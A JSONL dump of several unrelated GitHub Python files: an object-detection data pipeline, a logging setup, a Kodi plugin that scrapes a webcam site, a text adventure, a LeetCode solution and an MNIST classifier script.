bboxes, prob=0.5)\n image, image_shape, bboxes = random_crop(image, image_shape, bboxes, prob=0.5)\n\n # Image Color aug.\n if config.VISUAL_AUG:\n image = image_color_augmentation(image)\n\n # Transforming image and bboxes into fixed-size.\n image, scale, offset_hw = _image_transform(image, _image_size[phi], padding_value)\n image = _normalization_image(image, mode) if not debug else image\n\n # Clipping bboxes\n bboxes, bboxes_count = _bboxes_transform(bboxes, classes, scale, offset_hw, padding=False)\n bboxes = _clip_transformed_bboxes(image, bboxes, debug=debug)\n\n fmaps_shape = tf.constant(fmap_shapes, dtype=tf.int32)\n return image, bboxes[:, :4], bboxes[:, -1], fmaps_shape\n\n return _preprocess_data\n\n\n@tf.function\ndef _compute_targets_v1(image, bboxes, classes, fmap_shapes):\n num_cls = config.NUM_CLS\n\n cls_target_ = tf.zeros((0, num_cls + 2), dtype=tf.float32)\n reg_target_ = tf.zeros((0, 4 + 2), dtype=tf.float32)\n ind_target_ = tf.zeros((0, 1), dtype=tf.int32)\n\n classes = tf.cast(classes, tf.int32)\n\n for level in range(len(_STRIDES)):\n stride = _STRIDES[level]\n\n fh = fmap_shapes[level][0]\n fw = fmap_shapes[level][1]\n\n pos_x1, pos_y1, pos_x2, pos_y2 = shrink_and_normalize_boxes(bboxes, fh, fw, stride, config.SHRINK_RATIO)\n\n def build_map_function_target(args):\n pos_x1_ = args[0]\n pos_y1_ = args[1]\n pos_x2_ = args[2]\n pos_y2_ = args[3]\n box = args[4]\n cls = args[5]\n\n \"\"\" Create Negative sample \"\"\"\n neg_top_bot = tf.stack((pos_y1_, fh - pos_y2_), axis=0)\n neg_lef_rit = tf.stack((pos_x1_, fw - pos_x2_), axis=0)\n neg_pad = tf.stack([neg_top_bot, neg_lef_rit], axis=0)\n\n \"\"\" Regression Target: create positive sample \"\"\"\n _loc_target, _ap_weight, _area = create_reg_positive_sample(\n box, pos_x1_, pos_y1_, pos_x2_, pos_y2_, stride\n )\n\n \"\"\" Classification Target: create positive sample \"\"\"\n _cls_target = tf.zeros((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_, num_cls), dtype=tf.float32) + (\n _ALPHA / config.NUM_CLS)\n _cls_onehot = tf.ones((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_, 1), dtype=tf.float32) * (1 - _ALPHA)\n _cls_target = tf.concat((_cls_target[..., :cls], _cls_onehot, _cls_target[..., cls + 1:]), axis=-1)\n\n \"\"\" Padding Classification Target's negative sample \"\"\"\n _cls_target = tf.pad(\n _cls_target,\n tf.concat((neg_pad, tf.constant([[0, 0]])), axis=0),\n )\n\n \"\"\" Padding Soft Anchor's negative sample \"\"\"\n _ap_weight = tf.pad(_ap_weight, neg_pad, constant_values=1)\n\n \"\"\" Creating Positive Sample locations and padding it's negative sample \"\"\"\n _pos_mask = tf.ones((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_))\n _pos_mask = tf.pad(_pos_mask, neg_pad)\n\n \"\"\" Padding Regression Target's negative sample \"\"\"\n _loc_target = tf.pad(_loc_target, tf.concat((neg_pad, tf.constant([[0, 0]])), axis=0))\n\n \"\"\" Output Target \"\"\"\n # shape = (fh, fw, cls_num + 2)\n _cls_target = tf.concat([_cls_target, _ap_weight[..., None], _pos_mask[..., None]], axis=-1)\n # shape = (fh, fw, 4 + 2)\n _loc_target = tf.concat([_loc_target, _ap_weight[..., None], _pos_mask[..., None]], axis=-1)\n # (fh, fw)\n _area = tf.pad(_area, neg_pad, constant_values=1e7)\n\n return _cls_target, _loc_target, _area\n\n # cls_target : shape = (objects, fh, fw, cls_num + 2)\n # reg_target : shape = (objects, fh, fw, 4 + 2)\n # area : shape = (objects, fh, fw)\n level_cls_target, level_reg_target, level_area = tf.map_fn(\n build_map_function_target,\n elems=[pos_x1, pos_y1, pos_x2, pos_y2, bboxes, classes],\n fn_output_signature=(tf.float32, tf.float32, tf.float32),\n )\n # min area : shape = (objects, fh, fw) --> (fh, fw)\n level_min_area_indices = tf.argmin(level_area, axis=0, output_type=tf.int32)\n # (fh, fw) --> (fh * fw)\n level_min_area_indices = tf.reshape(level_min_area_indices, (-1,))\n\n # (fw, ), (fh, )\n locs_x, locs_y = tf.range(0, fw), tf.range(0, fh)\n\n # (fh, fw) --> (fh * fw)\n locs_xx, locs_yy = tf.meshgrid(locs_x, locs_y)\n locs_xx = tf.reshape(locs_xx, (-1,))\n locs_yy = tf.reshape(locs_yy, (-1,))\n\n # (fh * fw, 3)\n level_indices = tf.stack((level_min_area_indices, locs_yy, locs_xx), axis=-1)\n\n \"\"\" Select \"\"\"\n level_cls_target = tf.gather_nd(level_cls_target, level_indices)\n level_reg_target = tf.gather_nd(level_reg_target, level_indices)\n level_min_area_indices = tf.expand_dims(\n tf.where(tf.equal(level_cls_target[..., -1], 1.), level_min_area_indices, -1),\n axis=-1)\n\n cls_target_ = tf.concat([cls_target_, level_cls_target], axis=0)\n reg_target_ = tf.concat([reg_target_, level_reg_target], axis=0)\n ind_target_ = tf.concat([ind_target_, level_min_area_indices], axis=0)\n # ind_target_ = tf.concat([ind_target_, tf.expand_dims(level_min_area_indices, -1)], axis=0)\n\n # ind_target_ = tf.where(tf.equal(cls_target_[..., -1], 1.), ind_target_[..., 0], -1)[..., None]\n # Shape: (anchor-points, cls_num + 2), (anchor-points, 4 + 2)\n return image, cls_target_, reg_target_, ind_target_, tf.shape(bboxes)[0][..., None]\n\n\n@tf.function\ndef _compute_targets_v2(image, bboxes, classes, fmap_shapes):\n num_cls = config.NUM_CLS\n\n cls_target_ = tf.zeros((0, num_cls + 2), dtype=tf.float32)\n reg_target_ = tf.zeros((0, 4 + 2), dtype=tf.float32)\n ind_target_ = tf.zeros((0, 1), dtype=tf.int32)\n mk_target_ = tf.zeros((tf.shape(bboxes)[0], 0, 1), dtype=tf.float32)\n\n classes = tf.cast(classes, tf.int32)\n\n for level in range(len(_STRIDES)):\n stride = _STRIDES[level]\n\n fh = fmap_shapes[level][0]\n fw = fmap_shapes[level][1]\n\n pos_x1, pos_y1, pos_x2, pos_y2 = shrink_and_normalize_boxes(bboxes, fh, fw, stride, config.SHRINK_RATIO)\n\n def build_map_function_target(args):\n pos_x1_ = args[0]\n pos_y1_ = args[1]\n pos_x2_ = args[2]\n pos_y2_ = args[3]\n box = args[4]\n cls = args[5]\n\n \"\"\" Create Negative sample \"\"\"\n neg_top_bot = tf.stack((pos_y1_, fh - pos_y2_), axis=0)\n neg_lef_rit = tf.stack((pos_x1_, fw - pos_x2_), axis=0)\n neg_pad = tf.stack([neg_top_bot, neg_lef_rit], axis=0)\n\n \"\"\" Regression Target: create positive sample \"\"\"\n _loc_target, _ap_weight, _area = create_reg_positive_sample(\n box, pos_x1_, pos_y1_, pos_x2_, pos_y2_, stride\n )\n\n \"\"\" Classification Target: create positive sample \"\"\"\n _cls_target = tf.zeros((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_, num_cls), dtype=tf.float32) + (\n _ALPHA / config.NUM_CLS)\n _cls_onehot = tf.ones((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_, 1), dtype=tf.float32) * (1 - _ALPHA)\n _cls_target = tf.concat((_cls_target[..., :cls], _cls_onehot, _cls_target[..., cls + 1:]), axis=-1)\n\n \"\"\" Padding Classification Target's negative sample \"\"\"\n _cls_target = tf.pad(\n _cls_target,\n tf.concat((neg_pad, tf.constant([[0, 0]])), axis=0),\n )\n\n \"\"\" Padding Soft Anchor's negative sample \"\"\"\n _ap_weight = tf.pad(_ap_weight, neg_pad, constant_values=1)\n\n \"\"\" Creating Positive Sample locations and padding it's negative sample \"\"\"\n _pos_mask = tf.ones((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_))\n _pos_mask = tf.pad(_pos_mask, neg_pad)\n\n \"\"\" Padding Regression Target's negative sample \"\"\"\n _loc_target = tf.pad(_loc_target, tf.concat((neg_pad, tf.constant([[0, 0]])), axis=0))\n\n \"\"\" Output Target \"\"\"\n # shape = (fh, fw, cls_num + 2)\n _cls_target = tf.concat([_cls_target, _ap_weight[..., None], _pos_mask[..., None]], axis=-1)\n # shape = (fh, fw, 4 + 2)\n _loc_target = tf.concat([_loc_target, _ap_weight[..., None], _pos_mask[..., None]], axis=-1)\n # (fh, fw)\n _area = tf.pad(_area, neg_pad, constant_values=1e7)\n\n return _cls_target, _loc_target, _area\n\n # cls_target : shape = (objects, fh, fw, cls_num + 2)\n # reg_target : shape = (objects, fh, fw, 4 + 2)\n # area : shape = (objects, fh, fw)\n level_cls_target, level_reg_target, level_area = tf.map_fn(\n build_map_function_target,\n elems=[pos_x1, pos_y1, pos_x2, pos_y2, bboxes, classes],\n fn_output_signature=(tf.float32, tf.float32, tf.float32),\n )\n objects_mask = tf.reshape(level_cls_target[..., -1], (tf.shape(level_cls_target)[0], -1, 1))\n\n # min area : shape = (objects, fh, fw) --> (fh, fw)\n level_min_area_indices = tf.argmin(level_area, axis=0, output_type=tf.int32)\n # (fh, fw) --> (fh * fw)\n level_min_area_indices = tf.reshape(level_min_area_indices, (-1,))\n\n # (fw, ), (fh, )\n locs_x, locs_y = tf.range(0, fw), tf.range(0, fh)\n\n # (fh, fw) --> (fh * fw)\n locs_xx, locs_yy = tf.meshgrid(locs_x, locs_y)\n locs_xx = tf.reshape(locs_xx, (-1,))\n locs_yy = tf.reshape(locs_yy, (-1,))\n\n # (fh * fw, 3)\n level_indices = tf.stack((level_min_area_indices, locs_yy, locs_xx), axis=-1)\n\n \"\"\" Select \"\"\"\n level_cls_target = tf.gather_nd(level_cls_target, level_indices)\n level_reg_target = tf.gather_nd(level_reg_target, level_indices)\n level_min_area_indices = tf.expand_dims(\n tf.where(tf.equal(level_cls_target[..., -1], 1.), level_min_area_indices, -1),\n axis=-1)\n\n cls_target_ = tf.concat([cls_target_, level_cls_target], axis=0)\n reg_target_ = tf.concat([reg_target_, level_reg_target], axis=0)\n ind_target_ = tf.concat([ind_target_, level_min_area_indices], axis=0)\n mk_target_ = tf.concat([mk_target_, objects_mask], axis=1)\n\n # Shape: (anchor-points, cls_num + 2), (anchor-points, 4 + 2)\n return image, cls_target_, reg_target_, ind_target_, tf.shape(bboxes)[0][..., None], mk_target_\n\n\ndef inputs_targets_v1(image, bboxes, bboxes_count, fmaps_shape):\n inputs = {\n \"image\": image,\n \"bboxes\": bboxes,\n \"bboxes_count\": bboxes_count,\n \"fmaps_shape\": fmaps_shape,\n }\n return inputs\n\n\ndef inputs_targets_v2(image, cls_target, reg_target, ind_target, bboxes_cnt):\n inputs = {\n \"image\": image,\n \"cls_target\": cls_target,\n \"loc_target\": reg_target,\n \"ind_target\": ind_target,\n \"bboxes_cnt\": bboxes_cnt\n }\n return inputs\n\n\ndef inputs_targets_v3(image, cls_target, reg_target, ind_target, bboxes_cnt, mask_target, ):\n inputs = {\n \"image\": image,\n \"cls_target\": cls_target,\n \"loc_target\": reg_target,\n \"ind_target\": ind_target,\n \"bboxes_cnt\": bboxes_cnt,\n \"mask_target\": mask_target,\n }\n return inputs\n\n\ndef _load_data_from_tfrecord(ds_name, path=\"D:/datasets/\"):\n if ds_name == \"DPCB\":\n (train, test), ds_info = tfds.load(name=\"dpcb_db\",\n split=[\"train\", \"test\"],\n data_dir=path,\n with_info=True)\n elif ds_name == \"VOC\":\n (train, test), ds_info = tfds.load(name=\"pascal_voc\",\n split=[\"train\", \"test\"],\n data_dir=path,\n with_info=True,\n shuffle_files=True)\n elif ds_name == \"VOC_mini\":\n (train, test), ds_info = tfds.load(name=\"pascal_voc_mini\",\n split=[\"train\", \"test\"],\n data_dir=path,\n with_info=True,\n shuffle_files=True)\n else:\n train, test, ds_info = None, None, None\n\n return train, test, ds_info.splits[\"train\"].num_examples, ds_info.splits[\"test\"].num_examples\n\n\ndef create_pipeline_v1(phi=0, mode=\"ResNetV1\", db=\"DPCB\", batch_size=1):\n autotune = tf.data.AUTOTUNE\n\n train, test, train_num, test_num = _load_data_from_tfrecord(db)\n\n # if db == \"DPCB\":\n # (train, test) = tfds.load(name=\"dpcb_db\", split=[\"train\", \"test\"], data_dir=\"C:/works/datasets/\")\n # else:\n # train = None\n # test = None\n\n train = train.map(preprocess_data_v1(phi=phi, mode=mode, fmap_shapes=_fmap_shapes(phi)),\n num_parallel_calls=autotune)\n train = train.shuffle(train_num)\n train = train.padded_batch(batch_size=batch_size, padding_values=(0.0, 0.0, 0, 0), drop_remainder=True)\n train = train.map(inputs_targets_v1, num_parallel_calls=autotune)\n train = train.repeat().prefetch(autotune)\n return train, test\n\n\ndef create_pipeline_v2(phi=0, mode=\"ResNetV1\", db=\"DPCB\", batch_size=1, debug=False):\n autotune = tf.data.AUTOTUNE\n _buffer = 1000\n\n if db == \"DPCB\":\n (train, test), ds_info = tfds.load(name=\"dpcb_db\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n with_info=True)\n elif db == \"VOC\":\n (train, test), ds_info = tfds.load(name=\"pascal_voc\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n with_info=True,\n shuffle_files=True)\n elif db == \"VOC_mini\":\n (train, test), ds_info = tfds.load(name=\"pascal_voc_mini\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n with_info=True,\n shuffle_files=True)\n else:\n train, test, ds_info = None, None, None\n\n train_examples = ds_info.splits[\"train\"].num_examples\n test_examples = ds_info.splits[\"test\"].num_examples\n print(f\"[INFO] {db}: train( {train_examples} ), test( {test_examples} )\")\n\n train = train.map(preprocess_data_v2(\n phi=phi,\n mode=mode,\n fmap_shapes=_fmap_shapes(phi),\n debug=debug\n ), num_parallel_calls=autotune)\n\n train = (train.shuffle(_buffer, reshuffle_each_iteration=True).repeat())\n train = train.map(_compute_targets_v2, num_parallel_calls=autotune) # padded tensor.\n # train = train.batch(batch_size=batch_size, drop_remainder=True) # with _compute_targets_v1\n train = train.padded_batch(\n batch_size=batch_size,\n padding_values=(0., 0., 0., 0, 0, 0.),\n drop_remainder=True) # with _compute_targets_v2\n train = train.map(inputs_targets_v3, num_parallel_calls=autotune)\n train = train.prefetch(autotune)\n\n return train, test\n\n\ndef create_pipeline_test(phi=0, mode=\"ResNetV1\", db=\"DPCB\", batch_size=1, debug=False):\n autotune = tf.data.AUTOTUNE\n\n if db == \"DPCB\":\n (train, test) = tfds.load(name=\"dpcb_db\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\")\n\n elif db == \"VOC\":\n (train, test) = tfds.load(name=\"pascal_voc\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n shuffle_files=True)\n\n elif db == \"VOC_mini\":\n (train, test) = tfds.load(name=\"pascal_voc_mini\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n shuffle_files=True)\n\n else:\n train = None\n test = None\n\n feature_maps_shapes = _fmap_shapes(phi)\n\n train = train.map(preprocess_data_v1(phi=phi, mode=mode, fmap_shapes=feature_maps_shapes, max_bboxes=100,\n debug=debug), num_parallel_calls=autotune)\n\n train = train.shuffle(1000)\n train = train.padded_batch(batch_size=batch_size, padding_values=(0.0, 0.0, 0., 0.), drop_remainder=True)\n train = train.map(inputs_targets_v1, num_parallel_calls=autotune)\n train = train.prefetch(autotune)\n return train, test\n\n\nif __name__ == '__main__':\n eps = 10\n bs = 1\n\n train_t, test_t = create_pipeline_v2(\n phi=config.PHI,\n batch_size=bs,\n # debug=True,\n db=\"VOC\"\n )\n\n \"\"\" \"\"\"\n # for ep in range(eps):\n # for step, inputs_batch in enumerate(train_t):\n # # _cls = inputs_batch['cls_target'].numpy()\n # # _loc = inputs_batch['loc_target'].numpy()\n # # _ind = inputs_batch['ind_target'].numpy()\n # _int = inputs_batch['bboxes_cnt'].numpy()\n #\n # print(f\"Ep: {ep + 1}/{eps} - {step + 1}, Batch: {_int.shape[0]}, {_int[:, 0]}\")\n #\n # if np.min(_int) == 0:\n # break\n #\n # # if step > (16551 // bs) - 3:\n # # min_cnt = np.min(_int)\n # # print(f\"Ep: {ep + 1}/{eps} - {step + 1}, Batch: {_int.shape[0]}, {min_cnt}\")\n\n \"\"\" \"\"\"\n\n # iterations = 1\n # for step, inputs_batch in enumerate(train_t):\n # # if (step + 1) > iterations:\n # # break\n #\n # print(f\"[INFO] {step + 1} / {iterations}\")\n #\n # _cls = inputs_batch['cls_target'].numpy()\n # _loc = inputs_batch['loc_target'].numpy()\n # _ind = inputs_batch['ind_target'].numpy()\n # _int = inputs_batch['bboxes_cnt'].numpy()\n # _mks = inputs_batch['mask_target'].numpy()\n #\n # if _int > 15:\n # break\n #\n # obj_cnt = _int[0, 0]\n # p7_mk = np.reshape(_cls[0, 8500:, -1], (5, 5))\n # p6_mk = np.reshape(_cls[0, 8400:8500, -1], (10, 10))\n # p5_mk = np.reshape(_cls[0, 8000:8400, -1], (20, 20))\n #\n # p7_mk_obj = np.reshape(_mks[0, :, 8500:, 0], (obj_cnt, 5, 5))\n # p6_mk_obj = np.reshape(_mks[0, :, 8400:8500, 0], (obj_cnt, 10, 10))\n # p5_mk_obj = np.reshape(_mks[0, :, 8000:8400, 0], (obj_cnt, 20, 20))\n #\n # p7_ap = np.reshape(_cls[0, 8500:, -2], (5, 5))\n # p6_ap = np.reshape(_cls[0, 8400:8500, -2], (10, 10))\n # p5_ap = np.reshape(_cls[0, 8000:8400, -2], (20, 20))\n #\n # p7_ind = np.reshape(_ind[0, 8500:], (5, 5))\n # p6_ind = np.reshape(_ind[0, 8400:8500], (10, 10))\n # p5_ind = np.reshape(_ind[0, 8000:8400], (20, 20))\n\n \"\"\" \"\"\"\n\n # import matplotlib.pyplot as plt\n #\n # iterations = 10\n # print('test')\n # plt.figure(figsize=(10, 8))\n # for step, inputs_batch in enumerate(train_t):\n # if (step + 1) > iterations:\n # break\n #\n # print(f\"[INFO] {step + 1} / {iterations}\")\n #\n # _images = inputs_batch['image'].numpy()\n # _bboxes = inputs_batch['bboxes'].numpy()\n # _scales = inputs_batch['bboxes_count'].numpy()\n # _images_shape = inputs_batch['fmaps_shape'].numpy()\n #\n # _bboxes = tf.stack(\n # [\n # _bboxes[..., 1],\n # _bboxes[..., 0],\n # _bboxes[..., 3],\n # _bboxes[..., 2],\n # ],\n # axis=-1\n # )\n #\n # colors = np.array([[255.0, 0.0, 0.0]])\n # _images = tf.image.draw_bounding_boxes(\n # _images,\n # _bboxes,\n # colors=colors\n # )\n #\n # for i in range(bs):\n # plt.subplot(2, 2, i + 1)\n # plt.imshow(_images[i].numpy().astype(\"uint8\"))\n # # print(bboxes[i])\n # plt.tight_layout()\n # plt.pause(1)\n # # plt.close()\n\n \"\"\" \"\"\"\n\n # tfds.benchmark(train_t, batch_size=bs)\n # tfds.benchmark(train_t, batch_size=bs)\n\n # image : (Batch, None, None, 3)\n # bboxes : (Batch, None, 5)\n # bboxes_count : (Batch, 1)\n # fmaps_shape : (Batch, 5, 2)\n","repo_name":"gogo12235LYH/keras-sapd-v2","sub_path":"generators/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":33825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"9432759477","text":"import logging\r\n\r\nlogger = logging.Logger(name=\"APP\", level=logging.DEBUG)\r\n\r\nformatter = logging.Formatter(\"%(name)s:%(levelname)s: %(message)s\")\r\n\r\nconsole_handler = logging.StreamHandler()\r\nconsole_handler.setLevel(logging.CRITICAL)\r\nconsole_handler.setFormatter(formatter)\r\n\r\n\r\nfile_handler = logging.FileHandler(\"vkf.log\")\r\nfile_handler.setLevel(logging.DEBUG)\r\nfile_handler.setFormatter(formatter)\r\n\r\n\r\nlogger.addHandler(console_handler)\r\nlogger.addHandler(file_handler)\r\n","repo_name":"Saegl/vkf","sub_path":"vkf/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"32722464839","text":"# -*- coding: utf-8 -*-\n# Author: Lord Grey\n# Created : 01.03.2019\n# License: GPL v.3 https://www.gnu.org/copyleft/gpl.html\n\nimport re\nimport xbmcgui\nimport xbmcplugin\nimport resources.lib.helper as helper\n\n\ndef get_cats():\n\t\"\"\"\n\tcrawls the Catergorys from xvideos.com\n\tand returns them as a list of dicts\n\n\t[{'category': 'Pornos auf Deutsch', 'link': 'https://xvideos.com/lang/deutsch'},\n\t {'category': '3d', 'link': 'https://xvideos.com/?k=3d&top'}]\n\t\"\"\"\n\turl = 'https://chaturbate.com'\n\tcats = []\n\tsoup = helper.get_soup(url)\n\tul = soup.find(\"ul\", class_=\"sub-nav\")\n\n\tfor li in ul.find_all(\"li\"):\n\t\tcats.append(\n\t\t\tdict([\n\t\t\t\t('category', li.text),\n\t\t\t\t('link', url + li.a.get('href'))\n\t\t\t]))\n\n\treturn cats\n\n\ndef get_vids(url, category='none'):\n\t\"\"\"\n\tcrawls a given url form chaturbate.com for videos\n\tand returns them as a list of dicts\n\tif a catergory is given it will be added to the dict\n\n\ta returnd dict looks like this\n\t\t KEYS VALUE\n\t[{ 'title': 'BF HAVE 8 INC BUT YOUR ',\n\t\t'link': 'https://chaturbate.com/nasty_girl_masturbate',\n\t'duration': '5 min',\n\t 'thumb': 'https://img-hw.com/videos/thumbs169/a3/ed/36/a3ed367bcb5a69a9ad.14.jpg',\n\t\t 'res': '720p',\n\t 'views': '13k',\n\t'uploader': 'hans',\n\t'category': 'Grany'}]\n\t\"\"\"\n\n\thardcoded = 'https://chaturbate.com'\n\tvideo_info = []\n\tvideos = []\n\n\tsoup = helper.get_soup(url)\n\n\tvideos = soup.find_all(\"li\", class_=\"room_list_room\")\n\n\tfor info in videos:\n\t\tres = ''\n\t\ttitle = info.find(\"a\", href=True).get('href')[1:-1]\n\t\tuploader = info.find(\"a\", href=True).get('href')\n\t\timg = info.find(\"a\", href=True).find('img').get('src')\n\n\t\t# views and time are only seperatot bei \",\" on the site\n\t\tduraview = info.find(\"li\", class_=\"cams\").text.split(\",\")\n\t\tviews = duraview[1]\n\n\t\t# if duraview[0].find(\"h\") != -1: #\n\t\t# h = float(duraview[0][:-4])\n\t\t# duration = (h * 60) * 60\n\n\t\t# else:\n\t\t# duration = duraview[0][:-5] * 60\n\n\t\tvideo_info.append(\n\t\t\tdict([\n\t\t\t\t('title', title),\n\t\t\t\t('link', hardcoded + uploader),\n\t\t\t\t('duration', 0),\n\t\t\t\t('thumb', img),\n\t\t\t\t('res', res),\n\t\t\t\t('views', views),\n\t\t\t\t('uploader', title),\n\t\t\t\t('category', category)\n\t\t\t]))\n\treturn video_info\n\n\ndef play_video(_handle, video):\n\t\"\"\"\n\tPlay a video by the provided path.\n\n\t:param path: Fully-qualified video URL\n\t:type path: str\n\t\"\"\"\n\n\tsoup = helper.get_soup(video)\n\tpattern = r\"\"\"https.*\\.m3u8\"\"\"\n\tlink = re.findall(pattern, str(soup))[0].replace(r'\\u002D', '-')\n\n\t# Create a playable item with a path to play.\n\tplay_item = xbmcgui.ListItem(path=link)\n\n\t# Pass the item to the Kodi player.\n\txbmcplugin.setResolvedUrl(_handle, True, listitem=play_item)\n","repo_name":"Space2Walker/plugin.video.chaturbate","sub_path":"resources/lib/chaturbate.py","file_name":"chaturbate.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"34195573405","text":"rooms = {'1':{'name':'room1', 'description':'this is room one ', 'exit':{'east': '2', 'south': '4'}, 'invent':[]},\n '2':{'name':'room2', 'description':'this is room two ', 'exit':{'west': '1','east': '3','south': '5'}, 'invent':[]},\n '3':{'name':'room3', 'description':'this is room three ', 'exit':{'west': '2','south': '6'}, 'invent':[]},\n '4':{'name':'room4', 'description':'this is room four ', 'exit':{'north': '1','south': '7','east': '5'}, 'invent':['macbook']},\n '5':{'name':'room5', 'description':'this is room five ', 'exit':{'north': '2','south': '8','east': '6','west': '4'}, 'invent':['food']},\n '6':{'name':'room6', 'description':'this is room six ', 'exit':{'west': '5','south': '9','north': '3'}, 'invent':['botle']},\n '7':{'name':'room7', 'description':'this is room seven ', 'exit':{'north': '4','east': '8'}, 'invent':[]},\n '8':{'name':'room8', 'description':'this is room eight ', 'exit':{'north': '5','east': '9','west': '7'}, 'invent':['book']},\n '9':{'name':'room9', 'description':'this is room nine ', 'exit':{'north': '6', 'west': '8'}, 'invent':[]},\n }\n\n\n\nchar = {'position':'1', 'invent':['apple']}\n\n#1 2 3\n#4 5 6\n#7 8 9\n\n\ndef move(direction):\n global char\n position=char['position']\n room_id=rooms[position]['exit']\n if room_id.get(direction):\n char['position']=str(room_id.get(direction))\n describe_room()\n else:\n print(\"No such exit\")\n\n\ndef describe_room(arg=None):\n id=char['position']\n print(\"___________\\n|{0} \\n|Description: {1}\\n|Invents: {2}\\n___________\".format(rooms[id]['name'], rooms[id]['description'], rooms[id]['invent']))\n\n\ndef describe_pocket(arg=None):\n print(\"Your pocket has: {0}\".format(char['invent']))\n\n\ndef describe_handlers(arg=None):\n print(\"Handler list:\")\n for i in handlers.keys():\n print(\"- \" + i)\n\n\ndef describe_room_directions(arg=None):\n id = char['position']\n exits = rooms[id]['exit']\n for i in exits:\n room_id = exits[i]\n print(i, rooms[room_id]['name'])\n\n\ndef move_invent(move_from, move_to):\n if len(move_from) > 0:\n thing = str(input(\"What to take hare? \"))\n if thing in move_from:\n move_from.remove(thing)\n move_to.append(thing)\n return thing\n else:\n return False\n else:\n return False\n\n\ndef put(arg=None):\n movement=move_invent(char['invent'], rooms[char['position']]['invent'])\n if movement:\n print(\"You lef \" + movement + \" in this room\")\n else:\n print(\"You don't have it\")\n\n\ndef take(arg=None):\n movement=move_invent(rooms[char['position']]['invent'], char['invent'])\n if movement:\n print(\"You took \"+ movement + \" in this room\")\n else:\n print(\"No such thing in this room\")\n\n\nhandlers = {'list': describe_handlers,\n 'look_room': describe_room,\n 'look_pocket': describe_pocket,\n 'directions': describe_room_directions,\n 'put': put,\n 'take': take,\n 'west':move,\n 'east':move,\n 'north':move,\n 'south':move}\n\n\ndef main():\n describe_handlers()\n\n while True:\n command = input(\"Do your choice \")\n\n if len(command) != 0 and handlers.get(command.split()[0]):\n handlers[command.split()[0]](command)\n else:\n print(\"No such choice, please try something from list\")\n\nmain()\n","repo_name":"vprotsenko/python-","sub_path":"homework/lesson16/rooms.py","file_name":"rooms.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"14408654233","text":"from typing import List, Optional\nimport math\nimport numpy as np\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n if nums is None:\n return 0\n n = len(prices)\n if n == 1:\n return 0\n\n minprice = np.inf\n maxplus = 0\n for i in prices:\n if i < minprice:\n minprice = i\n continue\n\n if (i - minprice) > maxplus:\n maxplus = i - minprice\n\n return maxplus\n\nif __name__ == '__main__':\n nums = [7,1,5,3,6,4]\n nums = [7,6,4,3,1]\n res = Solution().maxProfit(prices=nums)\n print(res)","repo_name":"DaiJitao/algorithm","sub_path":"leetcode_china/demo121.py","file_name":"demo121.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70193062410","text":"import itertools\nimport numpy as np\nimport pandas as pd\nimport evaluation as e\nimport read_dataset as rd\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.neural_network import BernoulliRBM\nfrom sklearn.ensemble import RandomForestClassifier\n\ndef evaluate_parameters():\n X,y = get_train_data(limit=25)\n\n scores = []\n scores_std = []\n\n print('Start learning...')\n forests = [70]\n rbm_components = [1100]\n rbm_learning_rate = [0.06]\n rbm_n_iter = [20]\n\n it = itertools.product(forests,rbm_components,rbm_learning_rate,rbm_n_iter)\n\n for (trees,components,learning_rate,n_iter) in it:\n classifier = get_classifier(trees,components,learning_rate,n_iter)\n name = \"plots_pipeline/pipeline_{}.png\".format(trees)\n e.evaluate_classifier(classifier,X,y, name=name)\n\ndef submission(trees=70,components=1100,learning_rate=0.06,n_iter=20):\n X,y,test_X = get_train_and_test_data()\n\n print(\"Defining classifiers\")\n classifier = get_classifier(trees,components,learning_rate,n_iter)\n print(\"Training classifier\")\n classifier.fit(X,y)\n predictions = classifier.predict(test_X)\n\n #Most submitions are cute with a CSV. Might as well learn how to do it.\n pd.DataFrame({\"ImageId\": range(1,len(predictions)+1), \"Label\": predictions}).to_csv('submit_rbm.csv', index=False, header=True)\n\ndef get_classifier(trees,components,learning_rate,n_iter):\n rbm = BernoulliRBM(verbose=True,n_components=components,\n n_iter=n_iter,learning_rate=learning_rate)\n random_forest = RandomForestClassifier(trees)\n return Pipeline(steps=[('rbm',rbm), ('forest',random_forest)])\n\ndef scale(X):\n return (X - np.min(X, 0)) / (np.max(X, 0) + 0.0001) # 0-1 scaling\n\ndef get_train_data(limit=-1):\n print('Loading train data')\n X,y = rd.read_train(limit=limit)\n print('Augmenting data set')\n X,y = rd.nudge_dataset(X,y)\n print('Scaling data')\n X = scale(X)\n return X,y\n\ndef get_train_and_test_data(train_limit=-1,test_limit=-1):\n X,y = get_train_data(train_limit)\n print('Loading test data')\n test_X = rd.read_test(limit=test_limit)\n test_X = scale(test_X)\n return X,y,test_X\n\n#evaluate_parameters()\nsubmission()\n","repo_name":"costapt/kaggle_digit_recognizer","sub_path":"rbm_with_random_forest.py","file_name":"rbm_with_random_forest.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
